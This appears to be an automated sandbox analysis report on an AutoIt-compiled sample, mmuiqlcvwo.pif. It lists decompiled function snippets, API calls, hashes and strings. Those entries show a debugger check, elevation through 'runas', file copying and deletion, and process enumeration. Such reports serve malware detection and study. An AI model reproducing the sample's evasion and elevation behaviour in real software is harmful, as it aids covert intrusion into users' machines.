Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 9546a0be91a5fd7a43448b752edc20391c28e8305f0970862b1d0aec066ca7c9
Instruction ID: 6f6766dc4f6e9cd137599e5f05d9f36294e558debbd0debba319b53ece6a612e
Opcode Fuzzy Hash: 9546a0be91a5fd7a43448b752edc20391c28e8305f0970862b1d0aec066ca7c9
Instruction Fuzzy Hash: E41136307053153BEF15DB78CC41B7E3BC9EF95B54B48802EF8009A2D2EB60ED5192A0

Uniqueness

Uniqueness Score: -1.00%

Function 001912D7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E001912D7(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, signed int _a28) {
				struct HWND__* _t20;
				struct HWND__* _t21;

				if(_a8 == 0x30) {
					E0019D6E4(0x1d0078, _a4);
				} else {
					_t27 = _a8 - 0x110;
					if(_a8 == 0x110) {
						E0019D70B(0x1d0078, _t27, _a4, _a20, _a28 & 1);
						if((_a28 & 0x00000001) != 0) {
							_t20 =  *0x1cdfd4(_a4);
							if(_t20 != 0) {
								_t21 = GetDlgItem(_t20, 0x3021);
								if(_t21 != 0 && (_a28 & 0x00000008) != 0) {
									SetWindowTextW(_t21, 0x1c22e4);
								}
							}
						}
					}
				}
				return 0;
			}

0x001912de
0x00191341
0x001912e0
0x001912e0
0x001912e7
0x001912fd
0x00191306
0x0019130b
0x00191313
0x0019131b
0x00191323
0x00191331
0x00191331
0x00191323
0x00191313
0x00191306
0x001912e7
0x00191349

APIs

Part of subcall function 0019D70B: _swprintf.LIBCMT ref: 0019D731
Part of subcall function 0019D70B: _strlen.LIBCMT ref: 0019D752
Part of subcall function 0019D70B: SetDlgItemTextW.USER32(?,001CD154,?), ref: 0019D7B2
Part of subcall function 0019D70B: GetWindowRect.USER32(?,?), ref: 0019D7EC
Part of subcall function 0019D70B: GetClientRect.USER32(?,?), ref: 0019D7F8

GetDlgItem.USER32(00000000,00003021), ref: 0019131B
SetWindowTextW.USER32(00000000,001C22E4), ref: 00191331

Strings

0, xrefs: 001912DA

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: 88b9d8dd02a2eee18bfc2f34a025366e2b6cf4223add6bf8bf176d115ab5e06c
Instruction ID: f1b7e1a55dc32c32ace848e1d5fde01ee1b3d6ce8faaa7e4125e7c874de28de2
Opcode Fuzzy Hash: 88b9d8dd02a2eee18bfc2f34a025366e2b6cf4223add6bf8bf176d115ab5e06c
Instruction Fuzzy Hash: E3F0AF74580249B7DF260F609C09BE93F69BF147A5F408018FC89919E1C778CAD1EB20

Uniqueness

Uniqueness Score: -1.00%

Function 001A04BA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E001A04BA(void* __ecx, void* __ebp, void* _a4) {
				void* __esi;
				long _t2;
				void* _t6;

				_t6 = __ecx;
				_t2 = WaitForSingleObject(_a4, 0xffffffff);
				if(_t2 == 0xffffffff) {
					_push(GetLastError());
					return E00196CC9(E00196CCE(_t6, 0x1d00e0, L"\nWaitForMultipleObjects error %d, GetLastError %d", 0xffffffff), 0x1d00e0, 0x1d00e0, 2);
				}
				return _t2;
			}

0x001a04ba
0x001a04c0
0x001a04c9
0x001a04d2
0x00000000
0x001a04f1
0x001a04f2

APIs

WaitForSingleObject.KERNEL32(?,000000FF,001A05D9,?,?,001A064E,?,?,?,?,?,001A0638), ref: 001A04C0
GetLastError.KERNEL32(?,?,001A064E,?,?,?,?,?,001A0638), ref: 001A04CC

Part of subcall function 00196CCE: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00196CEC

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 001A04D5

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: 94454520507bf48c8388640cc435af2336e3f0aefe1b7676b2797d4595115628
Instruction ID: 11618be6858b85bc6ec9b42ab82616f1901032e92a2776c36c5193a7b03c8602
Opcode Fuzzy Hash: 94454520507bf48c8388640cc435af2336e3f0aefe1b7676b2797d4595115628
Instruction Fuzzy Hash: 0ED05E3190903177DA0123246D0AFAE79159B27770F608B1EF675652EACF744CA182E5

Uniqueness

Uniqueness Score: -1.00%

Function 0019D6C1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0019D6C1(void* __ecx) {
				struct HRSRC__* _t3;
				void* _t5;

				_t5 = __ecx;
				_t3 = FindResourceW(GetModuleHandleW(0), L"RTL", 5);
				if(_t3 != 0) {
					 *((char*)(_t5 + 0x64)) = 1;
					return _t3;
				}
				return _t3;
			}

0x0019d6c4
0x0019d6d4
0x0019d6dc
0x0019d6de
0x00000000
0x0019d6de
0x0019d6e3

APIs

GetModuleHandleW.KERNEL32(00000000,?,0019CFBE,?), ref: 0019D6C6
FindResourceW.KERNEL32(00000000,RTL,00000005,?,0019CFBE,?), ref: 0019D6D4

Strings

RTL, xrefs: 0019D6CE

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: fd2ad08c0ae07194ddf7521c61b6d0c1986d05cf68d33ede2c5bba697d375e6d
Instruction ID: e3a2eda54309d973ef41a38b7494703f5839079a77c645fe45d445ff6a9ce5f1
Opcode Fuzzy Hash: fd2ad08c0ae07194ddf7521c61b6d0c1986d05cf68d33ede2c5bba697d375e6d
Instruction Fuzzy Hash: 1EC0123128132167EB3017307C0DF832E586B10B12F19044AF685DA6D0DAF5D890C6A0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mmuiqlcvwo.pif PID: 5828 Parent PID: 4896 mmuiqlcvwo.pifCOMMON

Executed Functions

Function 008398F0, Relevance: 33.9, APIs: 21, Instructions: 2413COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00839911

Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511

_memmove.LIBCMT ref: 0083995C

Part of subcall function 008414F7: std::exception::exception.LIBCMT ref: 00841546
Part of subcall function 008414F7: std::exception::exception.LIBCMT ref: 00841560
Part of subcall function 008414F7: __CxxThrowException@8.LIBCMT ref: 00841571

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 008399A3
_memmove.LIBCMT ref: 00839FE6
_memmove.LIBCMT ref: 0083A914
_memmove.LIBCMT ref: 00859769

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
String ID:
API String ID: 2383988440-0
Opcode ID: dc92b37ce389a8f6a8272e320c40ff37fa8ebce0c74834c70951e9b0e381d2cf
Instruction ID: 503a1e6a9d8d137afc5a499d04c370eb862d12ad87c5288f5bcf130eeedcce07
Opcode Fuzzy Hash: dc92b37ce389a8f6a8272e320c40ff37fa8ebce0c74834c70951e9b0e381d2cf
Instruction Fuzzy Hash: 25134B74608245CFCB28DF28C485A2AB7E5FF89304F14896DE88ACB355E775E845CB93

Uniqueness

Uniqueness Score: -1.00%

Function 0087BCB3, Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0083F220: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\33920049\fmkkelc.omp,0083F1F5,C:\Users\user\33920049\fmkkelc.omp,008D90E8,C:\Users\user\33920049\fmkkelc.omp,?,0083F1F5,?,?,00000001), ref: 0083F23C

Part of subcall function 008638ED: __wsplitpath.LIBCMT ref: 00863913
Part of subcall function 008638ED: __wsplitpath.LIBCMT ref: 00863935
Part of subcall function 008638ED: __wcsicoll.LIBCMT ref: 00863959

Part of subcall function 0086397D: GetFileAttributesW.KERNELBASE(?), ref: 00863984

_wcscat.LIBCMT ref: 0087BD20
_wcscat.LIBCMT ref: 0087BD49
__wsplitpath.LIBCMT ref: 0087BD76
FindFirstFileW.KERNELBASE(?,?), ref: 0087BD8E
_wcscpy.LIBCMT ref: 0087BDFD
_wcscat.LIBCMT ref: 0087BE0F
_wcscat.LIBCMT ref: 0087BE21
lstrcmpiW.KERNEL32(?,?), ref: 0087BE4D
DeleteFileW.KERNEL32(?), ref: 0087BE5F
MoveFileW.KERNEL32(?,?), ref: 0087BE7F
CopyFileW.KERNEL32(?,?,00000000), ref: 0087BE96
DeleteFileW.KERNEL32(?), ref: 0087BEA1
CopyFileW.KERNELBASE(?,?,00000000), ref: 0087BEB8
FindClose.KERNEL32(00000000), ref: 0087BEBF
MoveFileW.KERNEL32(?,?), ref: 0087BEDB
FindNextFileW.KERNELBASE(00000000,00000010), ref: 0087BEF0
FindClose.KERNEL32(00000000), ref: 0087BF08

Strings

\*.*, xrefs: 0087BD1A, 0087BD43

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
String ID: \*.*
API String ID: 2188072990-1173974218
Opcode ID: d9bce159c14150376826149fdd8d9accd79d03e4d7f0d02b4ea0b5161c9b2cf2
Instruction ID: b4b56718f3ec1113726714de48dc190d54c09a120b1a9fa9fba6c5905041c5b7
Opcode Fuzzy Hash: d9bce159c14150376826149fdd8d9accd79d03e4d7f0d02b4ea0b5161c9b2cf2
Instruction Fuzzy Hash: 075161B2404344AAC720DBA4CC45FEB77E9FF85310F448A1DF699C2141EB35E648C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 008335F0, Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON

Download Yara Rule

APIs

Part of subcall function 00831D10: _wcslen.LIBCMT ref: 00831D11
Part of subcall function 00831D10: _memmove.LIBCMT ref: 00831D57

GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00833681
GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00833697
__wsplitpath.LIBCMT ref: 008336C2

Part of subcall function 0084392E: __wsplitpath_helper.LIBCMT ref: 00843970

_wcscpy.LIBCMT ref: 008336D7
_wcscat.LIBCMT ref: 008336EC
SetCurrentDirectoryW.KERNELBASE(?), ref: 008336FC

Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511

Part of subcall function 008414F7: std::exception::exception.LIBCMT ref: 00841546
Part of subcall function 008414F7: std::exception::exception.LIBCMT ref: 00841560
Part of subcall function 008414F7: __CxxThrowException@8.LIBCMT ref: 00841571

Part of subcall function 00833D20: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0083378C,?,?,?,00000010), ref: 00833D38
Part of subcall function 00833D20: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00833D71

_wcscpy.LIBCMT ref: 008337D0
_wcslen.LIBCMT ref: 00833853
_wcslen.LIBCMT ref: 008338AD

Strings

Error opening the file, xrefs: 008581AF
#include depth exceeded. Make sure there are no recursive includes, xrefs: 0085817E
Unterminated string, xrefs: 008582C6
_, xrefs: 0083394C

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
API String ID: 3393021363-188983378
Opcode ID: 1c76ec717d9c06557eb7decbde03bbbd4c5eeae4933bb1450106abb9aa57276f
Instruction ID: 57ffc8941618f89ccbed0e925f07add7831dfcb1193a8d92b653a7393bce37dd
Opcode Fuzzy Hash: 1c76ec717d9c06557eb7decbde03bbbd4c5eeae4933bb1450106abb9aa57276f
Instruction Fuzzy Hash: B6D18BB1508345AAD711EF68C841AABBBE8FFC5304F04492EF986D7201DB75DA4987E3

Uniqueness

Uniqueness Score: -1.00%

Function 0083D7A0, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0083D7BA

Part of subcall function 00832190: __wcsicoll.LIBCMT ref: 00832262
Part of subcall function 00832190: __wcsicoll.LIBCMT ref: 00832278
Part of subcall function 00832190: __wcsicoll.LIBCMT ref: 0083228E
Part of subcall function 00832190: __wcsicoll.LIBCMT ref: 008322A4
Part of subcall function 00832190: _wcscpy.LIBCMT ref: 008322C4

IsDebuggerPresent.KERNEL32 ref: 0083D7C6
GetFullPathNameW.KERNEL32(C:\Users\user\33920049\fmkkelc.omp,00000104,?,008D7F50,008D7F54), ref: 0083D82D

Part of subcall function 008316A0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 008316E5

SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0083D8A2
MessageBoxA.USER32 ref: 0085E14F
SetCurrentDirectoryW.KERNEL32(?), ref: 0085E1A3
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0085E1D3
GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0085E21D
ShellExecuteW.SHELL32(00000000), ref: 0085E224

Part of subcall function 008403E0: GetSysColorBrush.USER32(0000000F), ref: 008403EB
Part of subcall function 008403E0: LoadCursorW.USER32(00000000,00007F00), ref: 008403FA
Part of subcall function 008403E0: LoadIconW.USER32 ref: 00840410
Part of subcall function 008403E0: LoadIconW.USER32 ref: 00840423
Part of subcall function 008403E0: LoadIconW.USER32 ref: 00840436
Part of subcall function 008403E0: LoadImageW.USER32 ref: 0084045E
Part of subcall function 008403E0: RegisterClassExW.USER32 ref: 008404AD

Part of subcall function 00840350: CreateWindowExW.USER32 ref: 00840385
Part of subcall function 00840350: CreateWindowExW.USER32 ref: 008403AE
Part of subcall function 00840350: ShowWindow.USER32(?,00000000), ref: 008403C4
Part of subcall function 00840350: ShowWindow.USER32(?,00000000), ref: 008403CE

Part of subcall function 0083E2C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0083E3A7

Strings

It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 0085E148
C:\Users\user\33920049\fmkkelc.omp, xrefs: 0083D7F5, 0083D823, 0083D83A, 0085E1EC
runas, xrefs: 0085E218, 0085E247
AutoIt, xrefs: 0085E143

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: LoadWindow$Icon__wcsicoll$CurrentDirectoryName$CreateFullPathShow$BrushClassColorCursorDebuggerExecuteFileForegroundImageMessageModuleNotifyPresentRegisterShellShell__wcscpy
String ID: AutoIt$C:\Users\user\33920049\fmkkelc.omp$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 1688597619-3601087196
Opcode ID: 9c96d4c1d68d6898f8303937f8aa424612ef19f85b202e60ef3dcab3885020d1
Instruction ID: 093e8b7d07f73ebfc91fbf4a7aa79745604a6495d9967b4f6e8d34567988d499
Opcode Fuzzy Hash: 9c96d4c1d68d6898f8303937f8aa424612ef19f85b202e60ef3dcab3885020d1
Instruction Fuzzy Hash: 56411B70905344ABDB14A7E4EC45BED3778FB88711F000696FA44D7392DE745A8CCBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00863EC5, Relevance: 10.6, APIs: 7, Instructions: 78processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00863EE2
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00863EF2
Process32NextW.KERNEL32(00000000,0000022C), ref: 00863F1D
__wsplitpath.LIBCMT ref: 00863F48

Part of subcall function 0084392E: __wsplitpath_helper.LIBCMT ref: 00843970

_wcscat.LIBCMT ref: 00863F5B
__wcsicoll.LIBCMT ref: 00863F6B
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00863FA4

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
String ID:
API String ID: 2431060436-0
Opcode ID: 61772e26e5ede069f6f527273cbb301a08504101d00ca5f329ab09ebadaf389b
Instruction ID: dc98af9e34c98364cec28afd6eba828f4e0fff495140215decd129a5dcf65736
Opcode Fuzzy Hash: 61772e26e5ede069f6f527273cbb301a08504101d00ca5f329ab09ebadaf389b
Instruction Fuzzy Hash: 8E2171B6800209ABCB21DF54DC88BEAB7B8FB48300F144599F609D7141EB75AB85CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0083EE30, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(uxtheme.dll,0083EE15,0083D92E), ref: 0083EE3B
GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0083EE4D

Strings

IsThemeActive, xrefs: 0083EE47
uxtheme.dll, xrefs: 0083EE36

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: IsThemeActive$uxtheme.dll
API String ID: 2574300362-3542929980
Opcode ID: 3e19163424b65cacb9358ec088da8fd8f98fdd1192a880687912a6e253cf6e90
Instruction ID: 5b839561df9fc8b32740f3e4d2daef4e2f1808cc45ddfb03aad8738ab4a46a27
Opcode Fuzzy Hash: 3e19163424b65cacb9358ec088da8fd8f98fdd1192a880687912a6e253cf6e90
Instruction Fuzzy Hash: 21D0C9F490070BDADB304F21C80A60777E4FB44B52F105818A5A1D13E0DB78D480CA64

Uniqueness

Uniqueness Score: -1.00%

Function 0086399B, Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00000000), ref: 008639AC
FindFirstFileW.KERNELBASE(?,?), ref: 008639BD
FindClose.KERNEL32(00000000), ref: 008639D0

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: d6739f3801ff695c326824c1845e6154bd2e89fa0700741a2e2295a943cf9613
Instruction ID: 4d2b30d2553180bae6ef5f72ab8267205bcb495718e95703765ac64bd011947a
Opcode Fuzzy Hash: d6739f3801ff695c326824c1845e6154bd2e89fa0700741a2e2295a943cf9613
Instruction Fuzzy Hash: DAE048329155149B8620AB7CFC094E97B9CEF46375F104752FE38D21D0DB70AA904BD6

Uniqueness

Uniqueness Score: -1.00%

Function 0084F170, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_0001F12E), ref: 0084F175

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: c0a63729bd218f5d4783ac95edee8168ff6a885b02ab6f941c3a5dca6ee2c931
Instruction ID: a1120603b08cc086670dceaa0dd5ca6695029a03c6cb5f2840cc54f97e08d935
Opcode Fuzzy Hash: c0a63729bd218f5d4783ac95edee8168ff6a885b02ab6f941c3a5dca6ee2c931
Instruction Fuzzy Hash: 5790026465110596474517B09D4950537D0BA5C60274205686211DC666EA5840049711

Uniqueness

Uniqueness Score: -1.00%

Function 00833C50, Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00858392

Strings

#OnAutoItStartRegister, xrefs: 008583F1
#cs, xrefs: 00858549, 0085859B
#include-once, xrefs: 00858465
#notrayicon, xrefs: 0085838A
#requireadmin, xrefs: 008583AD
#NoAutoIt3Execute, xrefs: 008583CF
#ce, xrefs: 008585C3
#comments-start, xrefs: 00858535, 00858587
Unterminated group of comments, xrefs: 00858602
#comments-end, xrefs: 008585AF
#include, xrefs: 008584C5
Cannot parse #include, xrefs: 0085851F

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: __wcsnicmp
String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-3360698832
Opcode ID: dc2420c61bdd4379ad2671b13e29a7df9801aae0206f8dd3addaef21610f7777
Instruction ID: e7b052c4d05e1a074a9581523789ba26f23cbf30f9c219464c2c7f1d5bc37253
Opcode Fuzzy Hash: dc2420c61bdd4379ad2671b13e29a7df9801aae0206f8dd3addaef21610f7777
Instruction Fuzzy Hash: 1B61D771640719EBE721AB28DC42FAB3358FF50745F408026FC05FA386EF65EA4586E6

Uniqueness

Uniqueness Score: -1.00%

Function 00839430, Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32 ref: 008394B6
Sleep.KERNELBASE(0000000A,?), ref: 00839721
TranslateMessage.USER32(?), ref: 008397A6
DispatchMessageW.USER32 ref: 008397B1
PeekMessageW.USER32 ref: 008397C4

Strings

@GUI_CTRLHANDLE, xrefs: 0085DAC8
@GUI_CTRLID, xrefs: 0085DA4D
@GUI_WINHANDLE, xrefs: 0085DA85

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
